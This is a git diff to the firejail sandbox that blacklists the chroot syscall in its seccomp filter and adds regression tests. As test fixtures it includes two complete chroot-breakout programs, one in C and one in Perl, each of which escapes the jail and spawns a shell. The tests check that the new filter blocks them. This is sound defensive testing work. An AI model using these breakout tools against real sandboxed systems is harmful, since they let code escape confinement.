13 files changed, 281 insertions, 11 deletions

diff --git a/src/firejail/main.c b/src/firejail/main.c
index e39a41502..1c1c3a08f 100644
--- a/src/firejail/main.c
+++ b/src/firejail/main.c
@@ -1226,8 +1226,8 @@ int main(int argc, char **argv) {
                         fprintf(stderr, "Warning: default profile disabled by --chroot option\n");
                 else if (arg_overlay)
                         fprintf(stderr, "Warning: default profile disabled by --overlay option\n");
-                else if (cfg.home_private_keep)
-                        fprintf(stderr, "Warning: default profile disabled by --private-home option\n");
+//              else if (cfg.home_private_keep)
+//                      fprintf(stderr, "Warning: default profile disabled by --private-home option\n");
                 else {
                         // try to load a default profile
                         char *profile_name = DEFAULT_USER_PROFILE;
diff --git a/src/firejail/sandbox.c b/src/firejail/sandbox.c
index 427b3fc09..b23c5d742 100644
--- a/src/firejail/sandbox.c
+++ b/src/firejail/sandbox.c
@@ -210,6 +210,8 @@ int sandbox(void* sandbox_arg) {
                         if (!arg_quiet)
                                 printf("Dropping all Linux capabilities and enforcing default seccomp filter\n");
                 }
+                else
+                        arg_seccomp = 1;
                                                 
                 //****************************
                 // trace pre-install, this time inside chroot
diff --git a/src/firejail/seccomp.c b/src/firejail/seccomp.c
index 6ab3ae56e..353b212f6 100644
--- a/src/firejail/seccomp.c
+++ b/src/firejail/seccomp.c
@@ -385,6 +385,7 @@ void seccomp_filter_32(void) {
                 BLACKLIST(294), // migrate_pages
                 BLACKLIST(317), // move_pages
                 BLACKLIST(316), // vmsplice
+                BLACKLIST(61),  // chroot
                 RETURN_ALLOW
         };
 
@@ -558,6 +559,9 @@ int seccomp_filter_drop(void) {
 #ifdef SYS_vmsplice
                 filter_add_blacklist(SYS_vmsplice, 0);
 #endif
+#ifdef SYS_chroot
+                filter_add_blacklist(SYS_chroot, 0);
+#endif
         //#ifdef SYS_set_robust_list
         //              filter_add_blacklist(SYS_set_robust_list, 0);
         //#endif
diff --git a/src/firejail/usage.c b/src/firejail/usage.c
index c829b94f2..76c12ecc1 100644
--- a/src/firejail/usage.c
+++ b/src/firejail/usage.c
@@ -225,7 +225,7 @@ void usage(void) {
         printf("\t\tio_destroy, io_getevents, io_submit, io_cancel,\n");
         printf("\t\tremap_file_pages, mbind, get_mempolicy, set_mempolicy,\n");
         printf("\t\tmigrate_pages, move_pages, vmsplice, perf_event_open and\n");
-        printf("\t\tkexec_file_load.\n\n");
+        printf("\t\tkexec_file_load, chroot.\n\n");
         
         printf("\t--seccomp=syscall,syscall,syscall - enable seccomp filter, blacklist the\n");
         printf("\t\tdefault syscall list and the syscalls specified by the command.\n\n");
diff --git a/src/man/firejail.txt b/src/man/firejail.txt
index 52b75afaa..912a08580 100644
--- a/src/man/firejail.txt
+++ b/src/man/firejail.txt
@@ -905,7 +905,7 @@ sysfs,_sysctl, adjtimex, clock_adjtime, lookup_dcookie, perf_event_open, fanotif
 add_key, request_key, keyctl, uselib, acct, modify_ldt, pivot_root, io_setup,
 io_destroy, io_getevents, io_submit, io_cancel,
 remap_file_pages, mbind, get_mempolicy, set_mempolicy,
-migrate_pages, move_pages, vmsplice, and perf_event_open.
+migrate_pages, move_pages, vmsplice, perf_event_open and chroot.
 .br
 
 .br
diff --git a/src/tools/unchroot b/src/tools/unchroot
new file mode 100755
index 000000000..d32ce2682
--- /dev/null
+++ b/src/tools/unchroot
diff --git a/src/tools/unchroot.c b/src/tools/unchroot.c
new file mode 100644
index 000000000..21731296e
--- /dev/null
+++ b/src/tools/unchroot.c
@@ -0,0 +1,125 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+
+/* 
+ ** You should set NEED_FCHDIR to 1 if the chroot() on your
+ ** system changes the working directory of the calling
+ ** process to the same directory as the process was chroot()ed
+ ** to.
+ **
+ ** It is known that you do not need to set this value if you
+ ** running on Solaris 2.7 and below.
+ **
+ */
+#define NEED_FCHDIR 0
+
+#define TEMP_DIR "waterbuffalo"
+
+/* Break out of a chroot() environment in C */
+
+int main() {
+        int x;                                    /* Used to move up a directory tree */
+        int done=0;                               /* Are we done yet ? */
+#ifdef NEED_FCHDIR
+        int dir_fd;                               /* File descriptor to directory */
+#endif
+        struct stat sbuf;                         /* The stat() buffer */
+
+        /* 
+         ** First we create the temporary directory if it doesn't exist
+         */
+        if (stat(TEMP_DIR,&sbuf)<0) {
+                if (errno==ENOENT) {
+                        if (mkdir(TEMP_DIR,0755)<0) {
+                                fprintf(stderr,"Failed to create %s - %s\n", TEMP_DIR,
+                                        strerror(errno));
+                                exit(1);
+                        }
+                }
+                else {
+                        fprintf(stderr,"Failed to stat %s - %s\n", TEMP_DIR,
+                                strerror(errno));
+                        exit(1);
+                }
+        }
+        else if (!S_ISDIR(sbuf.st_mode)) {
+                fprintf(stderr,"Error - %s is not a directory!\n",TEMP_DIR);
+                exit(1);
+        }
+
+#ifdef NEED_FCHDIR
+        /* 
+         ** Now we open the current working directory
+         **
+         ** Note: Only required if chroot() changes the calling program's
+         **       working directory to the directory given to chroot().
+         **
+         */
+        if ((dir_fd=open(".",O_RDONLY))<0) {
+                fprintf(stderr,"Failed to open \".\" for reading - %s\n",
+                        strerror(errno));
+                exit(1);
+        }
+#endif
+
+        /* 
+         ** Next we chroot() to the temporary directory
+         */
+        if (chroot(TEMP_DIR)<0) {
+                fprintf(stderr,"Failed to chroot to %s - %s\n",TEMP_DIR,
+                        strerror(errno));
+                exit(1);
+        }
+
+#ifdef NEED_FCHDIR
+        /* 
+         ** Partially break out of the chroot by doing an fchdir()
+         **
+         ** This only partially breaks out of the chroot() since whilst
+         ** our current working directory is outside of the chroot() jail,
+         ** our root directory is still within it. Thus anything which refers
+         ** to "/" will refer to files under the chroot() point.
+         **
+         ** Note: Only required if chroot() changes the calling program's
+         **       working directory to the directory given to chroot().
+         **
+         */
+        if (fchdir(dir_fd)<0) {
+                fprintf(stderr,"Failed to fchdir - %s\n",
+                        strerror(errno));
+                exit(1);
+        }
+        close(dir_fd);
+#endif
+
+        /* 
+         ** Completely break out of the chroot by recursing up the directory
+         ** tree and doing a chroot to the current working directory (which will
+         ** be the real "/" at that point). We just do a chdir("..") lots of
+         ** times (1024 times for luck :). If we hit the real root directory before
+         ** we have finished the loop below it doesn't matter as .. in the root
+         ** directory is the same as . in the root.
+         **
+         ** We do the final break out by doing a chroot(".") which sets the root
+         ** directory to the current working directory - at this point the real
+         ** root directory.
+         */
+        for(x=0;x<1024;x++) {
+                chdir("..");
+        }
+        chroot(".");
+
+        /* 
+         ** We're finally out - so exec a shell in interactive mode
+         */
+        if (execl("/bin/sh","-i",NULL)<0) {
+                fprintf(stderr,"Failed to exec - %s\n",strerror(errno));
+                exit(1);
+        }
+}
diff --git a/src/tools/unchroot.pl b/src/tools/unchroot.pl
new file mode 100755
index 000000000..bd30ffe76
--- /dev/null
+++ b/src/tools/unchroot.pl
@@ -0,0 +1,33 @@
+#!/usr/bin/perl -w
+use strict;
+# unchroot.pl Dec 2007
+# http://pentestmonkey.net/blog/chroot-breakout-perl
+
+# This script may be used for legal purposes only.
+
+# Go to the root of the jail
+chdir "/";
+
+# Open filehandle to root of jail
+opendir JAILROOT, "." or die "ERROR: Couldn't get file handle to root of jailn";
+
+# Create a subdir, move into it
+mkdir "mysubdir";
+chdir "mysubdir";
+
+# Lock ourselves in a new jail
+chroot ".";
+
+# Use our filehandle to get back to the root of the old jail
+chdir(*JAILROOT);
+
+# Get to the real root
+while ((stat("."))[0] != (stat(".."))[0] or (stat("."))[1] != (stat(".."))[1]) {
+        chdir "..";
+}
+
+# Lock ourselves in real root - so we're not really in a jail at all now
+chroot ".";
+
+# Start an un-jailed shell
+system("/bin/sh");
diff --git a/test/configure b/test/configure
index 17bb22e1b..01f0c6ff0 100755
--- a/test/configure
+++ b/test/configure
@@ -22,7 +22,7 @@ ROOTDIR="/tmp/chroot"			# default chroot directory
 DEFAULT_FILES="/bin/bash /bin/sh "      # basic chroot files
 DEFAULT_FILES+="/etc/passwd /etc/nsswitch.conf /etc/group "
 DEFAULT_FILES+=`find /lib -name libnss*`        # files required by glibc
-DEFAULT_FILES+=" /bin/ls /bin/cat /bin/ps /usr/bin/id /usr/bin/whoami /usr/bin/wc /usr/bin/wget"
+DEFAULT_FILES+=" /bin/ls /bin/cat /bin/ps /usr/bin/id /usr/bin/whoami /usr/bin/wc /usr/bin/wget /bin/umount"
 
 rm -fr $ROOTDIR
 mkdir -p $ROOTDIR/{root,bin,lib,lib64,usr,home,etc,dev/shm,tmp,var/run,var/tmp,var/lock,proc}
@@ -33,6 +33,8 @@ do
 done
 cp --parents /lib64/ld-linux-x86-64.so.2 $ROOTDIR
 cp --parents /lib/ld-linux.so.2 $ROOTDIR
+cp ../src/tools/unchroot $ROOTDIR/.
+touch $ROOTDIR/this-is-my-chroot
 
 cd $ROOTDIR; find .
 mkdir -p usr/lib/firejail/
diff --git a/test/fs_chroot.exp b/test/fs_chroot.exp
index 448a00a7a..4ddf8d32a 100755
--- a/test/fs_chroot.exp
+++ b/test/fs_chroot.exp
@@ -4,7 +4,7 @@ set timeout 10
 spawn $env(SHELL)
 match_max 100000
 
-send -- "firejail --noprofile --chroot=/tmp/chroot\r"
+send -- "firejail  --chroot=/tmp/chroot\r"
 expect {
         timeout {puts "TESTING ERROR 0\n";exit}
         "Child process initialized"
@@ -13,12 +13,24 @@ sleep 1
 
 send -- "cd /home;pwd\r"
 expect {
-        timeout {puts "TESTING ERROR 3\n";exit}
+        timeout {puts "TESTING ERROR 0.1\n";exit}
         "home"
 }
 sleep 1
 send -- "bash\r"
 sleep 1
+send -- "ls /; pwd\r"
+expect {
+        timeout {puts "TESTING ERROR 0.2\n";exit}
+        "this-is-my-chroot"
+}
+expect {
+        timeout {puts "TESTING ERROR 0.3\n";exit}
+        "home"
+}
+
+
+
 send -- "ps aux; pwd\r"
 expect {
         timeout {puts "TESTING ERROR 1\n";exit}
@@ -50,5 +62,6 @@ expect {
 }
 sleep 1
 
+
 puts "all done\n"
 
diff --git a/test/fs_chroot_asroot.exp b/test/fs_chroot_asroot.exp
new file mode 100755
index 000000000..7e18153e0
--- /dev/null
+++ b/test/fs_chroot_asroot.exp
@@ -0,0 +1,91 @@
+#!/usr/bin/expect -f
+
+set timeout 10
+spawn $env(SHELL)
+match_max 100000
+
+send -- "firejail  --chroot=/tmp/chroot\r"
+expect {
+        timeout {puts "TESTING ERROR 0\n";exit}
+        "Child process initialized"
+}
+sleep 1
+
+send -- "cd /home;pwd\r"
+expect {
+        timeout {puts "TESTING ERROR 0.1\n";exit}
+        "home"
+}
+sleep 1
+send -- "bash\r"
+sleep 1
+send -- "ls /; pwd\r"
+expect {
+        timeout {puts "TESTING ERROR 0.2\n";exit}
+        "this-is-my-chroot"
+}
+expect {
+        timeout {puts "TESTING ERROR 0.3\n";exit}
+        "home"
+}
+
+send -- "umount /boot; pwd\r"
+expect {
+        timeout {puts "TESTING ERROR 0.4\n";exit}
+        "Bad system call"
+}
+expect {
+        timeout {puts "TESTING ERROR 0.5\n";exit}
+        "home"
+}
+
+send -- "/unchroot; pwd\r"
+expect {
+        timeout {puts "TESTING ERROR 0.6\n";exit}
+        "Bad system call"
+}
+expect {
+        timeout {puts "TESTING ERROR 0.7\n";exit}
+        "home"
+}
+
+
+
+
+
+send -- "ps aux; pwd\r"
+expect {
+        timeout {puts "TESTING ERROR 1\n";exit}
+        "/bin/bash"
+}
+expect {
+        timeout {puts "TESTING ERROR 2\n";exit}
+        "bash"
+}
+expect {
+        timeout {puts "TESTING ERROR 3\n";exit}
+        "ps aux"
+}
+expect {
+        timeout {puts "TESTING ERROR 4\n";exit}
+        "home"
+}
+sleep 1
+
+
+send -- "ps aux |wc -l; pwd\r"
+expect {
+        timeout {puts "TESTING ERROR 5\n";exit}
+        "5"
+}
+expect {
+        timeout {puts "TESTING ERROR 6\n";exit}
+        "home"
+}
+sleep 1
+
+
+
+
+puts "all done\n"
+
diff --git a/test/test-root.sh b/test/test-root.sh
index fcfe32a58..94ac3447d 100755
--- a/test/test-root.sh
+++ b/test/test-root.sh
@@ -5,6 +5,9 @@
 echo "TESTING: network interfaces"
 ./net_interface.exp
 
+echo "TESTING: chroot"
+./fs_chroot_asroot.exp
+
 echo "TESTING: servers rsyslogd, sshd, nginx"
 ./servers.exp
 
@@ -46,9 +49,6 @@ echo hello > tmpfile
 ./option_bind_file.exp
 rm -f tmpfile
 
-echo "TESTING: chroot"
-./fs_chroot.exp
-
 echo "TESTING: firemon --interface"
 ./firemon-interface.exp
 
diff --git a/test/trace.exp b/test/trace.exp
index bca3ac3b3..2b5003d83 100755
--- a/test/trace.exp
+++ b/test/trace.exp
@@ -91,5 +91,5 @@ expect {
 sleep 1
 
 
-puts "\n"
+puts "\nall done\n"